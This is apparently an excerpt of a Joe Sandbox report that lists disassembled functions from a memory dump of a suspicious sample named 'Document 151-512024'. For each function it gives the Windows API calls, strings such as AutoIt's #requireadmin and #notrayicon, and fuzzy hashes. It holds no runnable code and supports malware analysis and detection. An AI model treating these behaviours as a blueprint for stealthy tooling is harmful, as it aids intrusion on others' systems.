Strings

(A, xrefs: 00943986, 009833C9
Line: , xrefs: 009833EB

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line: $(A
API String ID: 2289894680-329646607
Opcode ID: 2d6652f07bf692f688a278de6da32c7f7cb991cf15c404d0df7ffeccff00553e
Instruction ID: fb9b8fbc227c9b5e2a14735ec0fd5113bfbb677b283b62797702995bb8e62afc
Opcode Fuzzy Hash: 2d6652f07bf692f688a278de6da32c7f7cb991cf15c404d0df7ffeccff00553e
Instruction Fuzzy Hash: 5B31C171448300AAD725EB70DC45FEBB7ECAF81710F10892AF5A986291EB749A49C7C3

Function 009C304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009C335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,009C3077,?,?), ref: 009C3378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 009C307A
_wcslen.LIBCMT ref: 009C309B
htons.WSOCK32(00000000,?,?,00000000), ref: 009C3106

Strings

255.255.255.255, xrefs: 009C3095, 009C309A

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 64b915a64928b1cc9e829e48a70d053e364ca4d127333c68cbd28bc1981b6a38
Instruction ID: b8bc9708d4a4154d6ba7d0553f4773ae4e3137a738e42752c330ebb71b44ee4c
Opcode Fuzzy Hash: 64b915a64928b1cc9e829e48a70d053e364ca4d127333c68cbd28bc1981b6a38
Instruction Fuzzy Hash: AA31E436A042059FCB10CF69C585FAA77E4EF54318F28C05DE9168B392DB32EE41C762

Function 009A95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009A961D

Strings

#OnAutoItStartRegister, xrefs: 009A95F3
#requireadmin, xrefs: 009A95D9
#notrayicon, xrefs: 009A95B7

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: ca1d4019ba07d3da7f733852ad1764681a62640c697b383a0d7bc3de50bf3f5f
Instruction ID: a57a3396620be24acfb0b02454e99ba62356d34fd5488ec4c3fb86b5fe18029d
Opcode Fuzzy Hash: ca1d4019ba07d3da7f733852ad1764681a62640c697b383a0d7bc3de50bf3f5f
Instruction Fuzzy Hash: 8921353260421066D331BA259C17FBBB39CBFD2310F108426F94A9B181EB55AD55C2D5

Function 009B49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009B4A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 009B4A5C
SetErrorMode.KERNEL32(00000000,?,?,009DCC08), ref: 009B4AD0

Strings

%lu, xrefs: 009B4A6F

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: c4420174323c6b7d8fe6437076bffe9dc13880f487bfcb67083b0aca9a212226
Instruction ID: 5d52b44e94b7d59fb685dc1c1bd9ff09652c135e5e995ef261ac546d34f05adc
Opcode Fuzzy Hash: c4420174323c6b7d8fe6437076bffe9dc13880f487bfcb67083b0aca9a212226
Instruction Fuzzy Hash: 7A318E70A40109AFDB10DF64C985EAA7BF8EF48318F1480A5F909DB252D771ED46DB61

Function 009D41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009D424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009D4264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 009D4271

Strings

msctls_trackbar32, xrefs: 009D4226

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 1bc4e1395ef9a4f01c9102c87d6d3b95b02041953c430824817f9f9859255851
Instruction ID: 411737b83b54344ba7eeeb0b7e9fc3b9a2f56d4da9bc63263ea38ad83509ca08
Opcode Fuzzy Hash: 1bc4e1395ef9a4f01c9102c87d6d3b95b02041953c430824817f9f9859255851
Instruction Fuzzy Hash: 70110671280208BFEF205F69CC06FAB3BACEF95B54F114515FB55E2190D671DC519B10

Function 009A2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00946B57: _wcslen.LIBCMT ref: 00946B6A

Part of subcall function 009A2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 009A2DC5
Part of subcall function 009A2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 009A2DD6
Part of subcall function 009A2DA7: GetCurrentThreadId.KERNEL32 ref: 009A2DDD
Part of subcall function 009A2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 009A2DE4

GetFocus.USER32 ref: 009A2F78

Part of subcall function 009A2DEE: GetParent.USER32(00000000), ref: 009A2DF9

GetClassNameW.USER32(?,?,00000100), ref: 009A2FC3
EnumChildWindows.USER32(?,009A303B), ref: 009A2FEB

Strings

%s%d, xrefs: 009A2FFF

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 9792a80625d0f9a8f98fc6ccccf6c7bdbcc1883b913b126268e785b1865fac6e
Instruction ID: e87cf6a5be11a03803a286858e37ee5e1059505e0fc94b884f78ba6036159e9d
Opcode Fuzzy Hash: 9792a80625d0f9a8f98fc6ccccf6c7bdbcc1883b913b126268e785b1865fac6e
Instruction Fuzzy Hash: 7F11A2B1600206ABCF547F749C85FEE376AAFC5308F048075FD09AB292DE309949DBA0

Function 009D5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009D58C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009D58EE
DrawMenuBar.USER32(?), ref: 009D58FD

Strings

0, xrefs: 009D588F

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 4c1780a7a5349b742364ef31a4cb5a87c2cced8370f4474776cb27823ae7cc98
Instruction ID: 1e21f419be9026b96603dfa23710483a19a17283beaae3cd2ec1673ee9bd74ad
Opcode Fuzzy Hash: 4c1780a7a5349b742364ef31a4cb5a87c2cced8370f4474776cb27823ae7cc98
Instruction Fuzzy Hash: 46018471554218EFDB119F15DC45BAEBBB8FF45361F10C09AF849D6251DB308A84EF21

Function 009D7803 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,00A118B0,009DA364,000000FC,?,00000000,00000000,?,?,?,009976CF,?,?,?,?,?), ref: 009D7805
GetFocus.USER32 ref: 009D780D

Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2

Part of subcall function 00959944: GetWindowLongW.USER32(?,000000EB), ref: 00959952

SendMessageW.USER32(00EDFC50,000000B0,000001BC,000001C0), ref: 009D787A

Strings

0n, xrefs: 009D7841, 009D7852

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$Long$FocusForegroundMessageSend
String ID: 0n
API String ID: 3601265619-3368625520
Opcode ID: 66d2d82ce2741fafd8d6052548b637071615c70029999572cdc627956e7ba63c
Instruction ID: 10a9807dfb2297fb44216efcec59bb98474505f9e3afcd644051c015c131ac1a
Opcode Fuzzy Hash: 66d2d82ce2741fafd8d6052548b637071615c70029999572cdc627956e7ba63c
Instruction Fuzzy Hash: 370184316451408FD325DB68E898BB673F9EF8A320F58426EE525873A0DB31AC46DB40

Function 0099D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0099D3BF
FreeLibrary.KERNEL32 ref: 0099D3E5

Strings

GetSystemWow64DirectoryW, xrefs: 0099D3B9
X64, xrefs: 0099D2A8

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 9356a08de7351e32d90b4083e02380048979920e2388cf913130ca150a6da1ea
Instruction ID: 1fe90baed72e89a91b89501f7296af9804e1374af0ca3b6bdfc86d9051a0c49b
Opcode Fuzzy Hash: 9356a08de7351e32d90b4083e02380048979920e2388cf913130ca150a6da1ea
Instruction Fuzzy Hash: 0BF055A184B7329BDF355B288CD8A6D3318AF10703B948916E812F6244EB24CC84C282

Function 009A007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5fc6de0d2edd867ac121448c1ea0001fc521616051ac5fde6eb072f379aa46d
Instruction ID: eb8e5398e89c0e1fa1bb2c009f34cd13b9f575b18318754c0831d62733293767
Opcode Fuzzy Hash: a5fc6de0d2edd867ac121448c1ea0001fc521616051ac5fde6eb072f379aa46d
Instruction Fuzzy Hash: 9EC14C75A0021AEFDB14CFA4C894BAEB7B9FF89704F108598E915EB251D731ED41CB90

Function 009C342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 009C3459
CoUninitialize.OLE32 ref: 009C3463
VariantInit.OLEAUT32(?), ref: 009C346E
VariantClear.OLEAUT32(?), ref: 009C371B

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 417e0441fe94c5346affd99be62dec979900341b3cf0c61919f9766970236814
Instruction ID: 9a93a7a6e4a77bb71af3c7602b5ad231aebc5da4a372a2be0789db362147f2e9
Opcode Fuzzy Hash: 417e0441fe94c5346affd99be62dec979900341b3cf0c61919f9766970236814
Instruction Fuzzy Hash: A6A10375A042109FC710DF68C595F2AB7E9EF88714F04885DF98A9B362DB34EE05CB92

Function 009A0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,009DFC08,?), ref: 009A05F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,009DFC08,?), ref: 009A0608
CLSIDFromProgID.OLE32(?,?,00000000,009DCC40,000000FF,?,00000000,00000800,00000000,?,009DFC08,?), ref: 009A062D
_memcmp.LIBVCRUNTIME ref: 009A064E

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: e93156bcb8f3e6971b68f35c129b3392b22a1547d09f724f3e87517f3791d148
Instruction ID: 67b28d90ce1f47785ade36d4020c68fef1dc37b6a730050bb1e4308562b4effd
Opcode Fuzzy Hash: e93156bcb8f3e6971b68f35c129b3392b22a1547d09f724f3e87517f3791d148
Instruction Fuzzy Hash: 8E810971A00109EFCB04DF94C988EEEB7B9FF89315F204559F516AB250DB71AE46CBA0

Function 00981391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 009814C0

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a18e4e57a5d275cb98e0e207b37b79206ee7472f25b4ba4c23476ccc7a5207a1
Instruction ID: 5c9d336dbf7a67397cbda94a384b2e665a938f48d2849aa9ec468fac7dcb3264
Opcode Fuzzy Hash: a18e4e57a5d275cb98e0e207b37b79206ee7472f25b4ba4c23476ccc7a5207a1
Instruction Fuzzy Hash: 53416C32A00111ABDB257BF99C55BBE3BACEFC1370F144626F429D23B2E67448435761

Function 009C1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 009C1AFD
WSAGetLastError.WSOCK32 ref: 009C1B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 009C1B8A
WSAGetLastError.WSOCK32 ref: 009C1B94

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 0818264bda73a2ddfbc0b54f9c51c173a26f675f816abd49cb14704bf8a4e230
Instruction ID: 4b06432755893fc17e87afe3a104c8eca0b4d9dd3bfa0a8c3e8d325fcc80f848
Opcode Fuzzy Hash: 0818264bda73a2ddfbc0b54f9c51c173a26f675f816abd49cb14704bf8a4e230
Instruction Fuzzy Hash: 1F41A074A40201AFE720AF24C886F2977E5AB85718F54849CF91A9F3D3D772DD42CB91

Function 0097B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b2a1084115c88792a5300ddcc3a105629db8cb1ae253913c88b95bf07132b0
Instruction ID: 7cf5e1f4af609f7ed4c733068fa5d4ba471772fd1646d84b3a26d787b57828d1
Opcode Fuzzy Hash: f1b2a1084115c88792a5300ddcc3a105629db8cb1ae253913c88b95bf07132b0
Instruction Fuzzy Hash: B441D976A00704BFD724AF78CC41B6ABBFDEBC4710F10852AF559DB692D77199018790

Function 009B56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 009B5783
GetLastError.KERNEL32(?,00000000), ref: 009B57A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009B57CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009B57FA

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 16b574969418e7fcf9ba9ac74c807d5ba46b1d152e420570a6efd95f1280b3be
Instruction ID: 25c77346b8f8812451eb0b88735310195eecbc148eeb82f75df4741927d24035
Opcode Fuzzy Hash: 16b574969418e7fcf9ba9ac74c807d5ba46b1d152e420570a6efd95f1280b3be
Instruction Fuzzy Hash: 08411A35600611DFCB11DF55C544B5ABBE6EF89720B198888F84AAF362CB34FD40CB91

Function 0097D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00966D71,00000000,00000000,009682D9,?,009682D9,?,00000001,00966D71,8BE85006,00000001,009682D9,009682D9), ref: 0097D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0097D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0097D9AB
__freea.LIBCMT ref: 0097D9B4

Part of subcall function 00973820: RtlAllocateHeap.NTDLL(00000000,?,00A11444,?,0095FDF5,?,?,0094A976,00000010,00A11440,009413FC,?,009413C6,?,00941129), ref: 00973852

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 8999f7f944e05d5fbc30c568a1c4d1af251f1e723977c62a0f5041f08db59ce1
Instruction ID: 9f9549c2c21d601a70406a2aaf5fe6b4860afac4ac99b74dd95df7dabcfe6cf8
Opcode Fuzzy Hash: 8999f7f944e05d5fbc30c568a1c4d1af251f1e723977c62a0f5041f08db59ce1
Instruction Fuzzy Hash: 6D31CD72A0221AABDF249F64DC41EAE7BB9EF80710B058269FD08D7250EB35CD50CB90

Function 009AAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 009AABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 009AAC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 009AAC74
SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 009AACC6

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 8430640e51de1a4928f18d25049e79808613d0dd4af64e312fb2acd8e6cbf7a1
Instruction ID: 14820688e9ace3ef60cfdd696f42b992b08e98d39b10cbd2558e43187af809b8
Opcode Fuzzy Hash: 8430640e51de1a4928f18d25049e79808613d0dd4af64e312fb2acd8e6cbf7a1
Instruction Fuzzy Hash: B7311470A446196FFF258F6588087FA7BBAAB8A330F04861AE4C5921D1C3798981D7D2

